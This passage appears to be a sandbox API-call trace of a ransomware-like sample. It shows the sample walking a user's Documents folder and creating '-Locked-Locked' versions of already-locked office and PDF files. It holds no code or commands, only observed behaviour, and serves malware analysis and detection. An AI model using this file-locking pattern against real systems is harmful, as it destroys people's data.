[0300.274] GetFileType (hFile=0x49c) returned 0x1 [0300.276] CloseHandle (hObject=0x49c) returned 1 [0300.276] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\88Z1o5.docx-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\88Z1o5.docx-Locked", lpFilePart=0x0) returned 0x32 [0300.276] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\88Z1o5.docx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\88Z1o5.docx-Locked-Locked", lpFilePart=0x0) returned 0x39 [0300.276] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0300.276] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\88Z1o5.docx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\88z1o5.docx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.277] GetFileType (hFile=0x49c) returned 0x1 [0300.277] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0300.277] GetFileType (hFile=0x49c) returned 0x1 [0300.278] CloseHandle (hObject=0x49c) returned 1 [0300.279] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\9wui5eVHXPKhOlhGPv40.docx-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\9wui5eVHXPKhOlhGPv40.docx-Locked", lpFilePart=0x0) returned 0x40 [0300.279] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\9wui5eVHXPKhOlhGPv40.docx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\9wui5eVHXPKhOlhGPv40.docx-Locked-Locked", lpFilePart=0x0) returned 0x47 [0300.279] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0300.279] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\9wui5eVHXPKhOlhGPv40.docx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\9wui5evhxpkholhgpv40.docx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.279] GetFileType (hFile=0x49c) returned 0x1 [0300.279] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0300.279] GetFileType (hFile=0x49c) returned 0x1 [0300.281] CloseHandle (hObject=0x49c) returned 1 [0300.281] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\awNrFZy3e3qK1nkjdW.pptx-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\awNrFZy3e3qK1nkjdW.pptx-Locked", lpFilePart=0x0) returned 0x3e [0300.281] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\awNrFZy3e3qK1nkjdW.pptx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\awNrFZy3e3qK1nkjdW.pptx-Locked-Locked", lpFilePart=0x0) returned 0x45 [0300.281] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0300.281] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\awNrFZy3e3qK1nkjdW.pptx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\awnrfzy3e3qk1nkjdw.pptx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.281] GetFileType (hFile=0x49c) returned 0x1 [0300.281] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0300.281] GetFileType (hFile=0x49c) returned 0x1 [0300.283] CloseHandle (hObject=0x49c) returned 1 [0300.283] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\azYkAGkUGGsOX2bnL.rtf-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\azYkAGkUGGsOX2bnL.rtf-Locked", lpFilePart=0x0) returned 0x3c [0300.283] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\azYkAGkUGGsOX2bnL.rtf-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\azYkAGkUGGsOX2bnL.rtf-Locked-Locked", lpFilePart=0x0) returned 0x43 [0300.283] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0300.284] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\azYkAGkUGGsOX2bnL.rtf-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\azykagkuggsox2bnl.rtf-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.284] GetFileType (hFile=0x49c) returned 0x1 [0300.284] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0300.284] GetFileType (hFile=0x49c) returned 0x1 [0300.286] CloseHandle (hObject=0x49c) returned 1 [0300.286] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\bf c.docx-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\bf c.docx-Locked", lpFilePart=0x0) returned 0x30 [0300.286] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\bf c.docx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\bf c.docx-Locked-Locked", lpFilePart=0x0) returned 0x37 [0300.286] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0300.286] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\bf c.docx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\bf c.docx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.287] GetFileType (hFile=0x49c) returned 0x1 [0300.287] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0300.287] GetFileType (hFile=0x49c) returned 0x1 [0300.288] CloseHandle (hObject=0x49c) returned 1 [0300.288] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\cERxr1OfWdsXa.xlsx-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\cERxr1OfWdsXa.xlsx-Locked", lpFilePart=0x0) returned 0x39 [0300.289] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\cERxr1OfWdsXa.xlsx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\cERxr1OfWdsXa.xlsx-Locked-Locked", lpFilePart=0x0) returned 0x40 [0300.289] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0300.289] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\cERxr1OfWdsXa.xlsx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\cerxr1ofwdsxa.xlsx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.289] GetFileType (hFile=0x49c) returned 0x1 [0300.289] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0300.289] GetFileType (hFile=0x49c) returned 0x1 [0300.291] CloseHandle (hObject=0x49c) returned 1 [0300.291] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\desktop.ini-Locked", lpFilePart=0x0) returned 0x32 [0300.291] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\desktop.ini-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\desktop.ini-Locked-Locked", lpFilePart=0x0) returned 0x39 [0300.291] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0300.292] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\desktop.ini-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\desktop.ini-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.292] GetFileType (hFile=0x49c) returned 0x1 [0300.292] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0300.292] GetFileType (hFile=0x49c) returned 0x1 [0300.294] CloseHandle (hObject=0x49c) returned 1 [0300.295] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\eUnC2MDENVIC3bG6_9q.xlsx-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\eUnC2MDENVIC3bG6_9q.xlsx-Locked", lpFilePart=0x0) returned 0x3f [0300.295] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\eUnC2MDENVIC3bG6_9q.xlsx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\eUnC2MDENVIC3bG6_9q.xlsx-Locked-Locked", lpFilePart=0x0) returned 0x46 [0300.295] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0300.295] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\eUnC2MDENVIC3bG6_9q.xlsx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\eunc2mdenvic3bg6_9q.xlsx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.295] GetFileType (hFile=0x49c) returned 0x1 [0300.295] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0300.296] GetFileType (hFile=0x49c) returned 0x1 [0300.297] CloseHandle (hObject=0x49c) returned 1 [0300.297] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\FQNOqAqIU_64xnNqSNa.xlsx-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\FQNOqAqIU_64xnNqSNa.xlsx-Locked", lpFilePart=0x0) returned 0x3f [0300.297] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\FQNOqAqIU_64xnNqSNa.xlsx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\FQNOqAqIU_64xnNqSNa.xlsx-Locked-Locked", lpFilePart=0x0) returned 0x46 [0300.297] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0300.297] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\FQNOqAqIU_64xnNqSNa.xlsx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\fqnoqaqiu_64xnnqsna.xlsx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.298] GetFileType (hFile=0x49c) returned 0x1 [0300.298] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0300.298] GetFileType (hFile=0x49c) returned 0x1 [0300.299] CloseHandle (hObject=0x49c) returned 1 [0300.300] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\fUkbCywvnkWTcZgPOjsY.ppt-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\fUkbCywvnkWTcZgPOjsY.ppt-Locked", lpFilePart=0x0) returned 0x3f [0300.300] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\fUkbCywvnkWTcZgPOjsY.ppt-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\fUkbCywvnkWTcZgPOjsY.ppt-Locked-Locked", lpFilePart=0x0) returned 0x46 [0300.300] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0300.300] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\fUkbCywvnkWTcZgPOjsY.ppt-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\fukbcywvnkwtczgpojsy.ppt-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.300] GetFileType (hFile=0x49c) returned 0x1 [0300.300] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0300.301] GetFileType (hFile=0x49c) returned 0x1 [0300.302] CloseHandle (hObject=0x49c) returned 1 [0300.302] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HBfGjDyK.doc-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\HBfGjDyK.doc-Locked", lpFilePart=0x0) returned 0x33 [0300.303] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HBfGjDyK.doc-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\HBfGjDyK.doc-Locked-Locked", lpFilePart=0x0) returned 0x3a [0300.304] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0300.304] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HBfGjDyK.doc-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\hbfgjdyk.doc-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.306] GetFileType (hFile=0x49c) returned 0x1 [0300.306] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0300.306] GetFileType (hFile=0x49c) returned 0x1 [0300.308] CloseHandle (hObject=0x49c) returned 1 [0300.308] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HUM 71h6W.pdf-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\HUM 71h6W.pdf-Locked", lpFilePart=0x0) returned 0x34 [0300.308] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HUM 71h6W.pdf-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\HUM 71h6W.pdf-Locked-Locked", lpFilePart=0x0) returned 0x3b [0300.308] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0300.308] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HUM 71h6W.pdf-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\hum 71h6w.pdf-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.309] GetFileType (hFile=0x49c) returned 0x1 [0300.309] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0300.309] GetFileType (hFile=0x49c) returned 0x1 [0300.310] CloseHandle (hObject=0x49c) returned 1 [0300.310] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\joed-0tT3pwKPHxST7.pptx-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\joed-0tT3pwKPHxST7.pptx-Locked", lpFilePart=0x0) returned 0x3e [0300.310] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\joed-0tT3pwKPHxST7.pptx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\joed-0tT3pwKPHxST7.pptx-Locked-Locked", lpFilePart=0x0) returned 0x45 [0300.310] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0300.310] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\joed-0tT3pwKPHxST7.pptx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\joed-0tt3pwkphxst7.pptx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.311] GetFileType (hFile=0x49c) returned 0x1 [0300.311] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0300.311] GetFileType (hFile=0x49c) returned 0x1 [0300.312] CloseHandle (hObject=0x49c) returned 1 [0300.320] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\jYYuHN3_bnMiF1-mgPtc.ots-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\jYYuHN3_bnMiF1-mgPtc.ots-Locked", lpFilePart=0x0) returned 0x3f [0300.320] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\jYYuHN3_bnMiF1-mgPtc.ots-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\jYYuHN3_bnMiF1-mgPtc.ots-Locked-Locked", lpFilePart=0x0) returned 0x46 [0300.320] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0300.320] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\jYYuHN3_bnMiF1-mgPtc.ots-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\jyyuhn3_bnmif1-mgptc.ots-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.320] GetFileType (hFile=0x49c) returned 0x1 [0300.320] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0300.320] GetFileType (hFile=0x49c) returned 0x1 [0300.322] CloseHandle (hObject=0x49c) returned 1 [0300.323] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\NyM PGDB-5 iHZerCT.doc-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\NyM PGDB-5 iHZerCT.doc-Locked", lpFilePart=0x0) returned 0x3d [0300.323] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\NyM PGDB-5 iHZerCT.doc-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\NyM PGDB-5 iHZerCT.doc-Locked-Locked", lpFilePart=0x0) returned 0x44 [0300.323] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0300.323] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\NyM PGDB-5 iHZerCT.doc-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\nym pgdb-5 ihzerct.doc-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.324] GetFileType (hFile=0x49c) returned 0x1 [0300.324] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0300.324] GetFileType (hFile=0x49c) returned 0x1 [0300.326] CloseHandle (hObject=0x49c) returned 1 [0300.326] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\o4aClzZ-jet.doc-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\o4aClzZ-jet.doc-Locked", lpFilePart=0x0) returned 0x36 [0300.326] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\o4aClzZ-jet.doc-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\o4aClzZ-jet.doc-Locked-Locked", lpFilePart=0x0) returned 0x3d [0300.326] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0300.327] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\o4aClzZ-jet.doc-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\o4aclzz-jet.doc-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.327] GetFileType (hFile=0x49c) returned 0x1 [0300.327] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0300.327] GetFileType (hFile=0x49c) returned 0x1 [0300.329] CloseHandle (hObject=0x49c) returned 1 [0300.329] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\pA5CsH5h5CcswZCjqi.docx-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\pA5CsH5h5CcswZCjqi.docx-Locked", lpFilePart=0x0) returned 0x3e [0300.329] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\pA5CsH5h5CcswZCjqi.docx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\pA5CsH5h5CcswZCjqi.docx-Locked-Locked", lpFilePart=0x0) returned 0x45 [0300.329] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0300.329] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\pA5CsH5h5CcswZCjqi.docx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\pa5csh5h5ccswzcjqi.docx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.329] GetFileType (hFile=0x49c) returned 0x1 [0300.330] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0300.330] GetFileType (hFile=0x49c) returned 0x1 [0300.331] CloseHandle (hObject=0x49c) returned 1 [0300.331] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\W7ZbDBvsnGLTRWeGfJh.pptx-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\W7ZbDBvsnGLTRWeGfJh.pptx-Locked", lpFilePart=0x0) returned 0x3f [0300.331] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\W7ZbDBvsnGLTRWeGfJh.pptx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\W7ZbDBvsnGLTRWeGfJh.pptx-Locked-Locked", lpFilePart=0x0) returned 0x46 [0300.331] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0300.332] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\W7ZbDBvsnGLTRWeGfJh.pptx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\w7zbdbvsngltrwegfjh.pptx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.332] GetFileType (hFile=0x49c) returned 0x1 [0300.332] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0300.332] GetFileType (hFile=0x49c) returned 0x1 [0300.333] CloseHandle (hObject=0x49c) returned 1 [0300.334] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\yPcZCDl_ldX.pptx-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\yPcZCDl_ldX.pptx-Locked", lpFilePart=0x0) returned 0x37 [0300.334] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\yPcZCDl_ldX.pptx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\yPcZCDl_ldX.pptx-Locked-Locked", lpFilePart=0x0) returned 0x3e [0300.334] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0300.334] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\yPcZCDl_ldX.pptx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\ypczcdl_ldx.pptx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.334] GetFileType (hFile=0x49c) returned 0x1 [0300.334] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0300.334] GetFileType (hFile=0x49c) returned 0x1 [0300.396] CloseHandle (hObject=0x49c) returned 1 [0300.526] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\zBhJ.pdf-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\zBhJ.pdf-Locked", lpFilePart=0x0) returned 0x2f [0300.526] GetFullPathNameW (in: 